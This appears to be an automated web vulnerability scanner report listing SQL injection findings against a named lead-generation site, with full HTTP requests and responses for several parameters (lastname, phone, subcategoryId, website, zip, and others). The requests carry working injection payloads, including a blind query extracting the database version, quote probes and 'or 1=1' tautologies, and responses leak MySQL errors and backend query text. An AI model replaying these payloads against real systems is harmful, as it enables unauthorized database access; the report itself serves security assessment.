GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc%00'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=t4b0ee6bnd20j50ah9liufve04; path=/ Content-Length: 6950 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1928__Take sales orders&attributeId_394=1939__Not sure&attributeId_395=1947__' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc%00''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4t3hqlge5agvri03fql9ppaob1; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=9aucqqphgpa9h3athkplrdtde3; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=87o46lnmqbv154jhjageq8vj47; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The lastname parameter appears to be vulnerable to SQL injection attacks. The payloads 91962056'%20or%201%3d1--%20 and 91962056'%20or%201%3d2--%20 were each submitted in the lastname parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:44:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
1.196. http://www.insideup.com/ppc/leadflow/cace00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/cace00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=borid9r74radreourmfr6cpe25; path=/ Content-Length: 6974 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... Id_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND 1=(' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code&1''=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1k1ifk9uej48506fjctb9lo4n6; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=rq11kbppavht4gssnqga8trj21; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=gahhmb8be0c2970gjmnbdqt5i5; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007'&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=rq61dik9hjcinvbv72jh6f5am6; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007''&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=43vimr7gfqrmapo928pb76bpi6; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa'&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=mg5pgf6etv63k5dio2qrkt2v64; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa''&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=k0iuotrqvacqo70rmkb1tqefo5; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=fc0bfc5khkk9fe1qv02lgect64; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBST' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code'' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ug8eetfvmq4u43kdf2981b9vk4; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
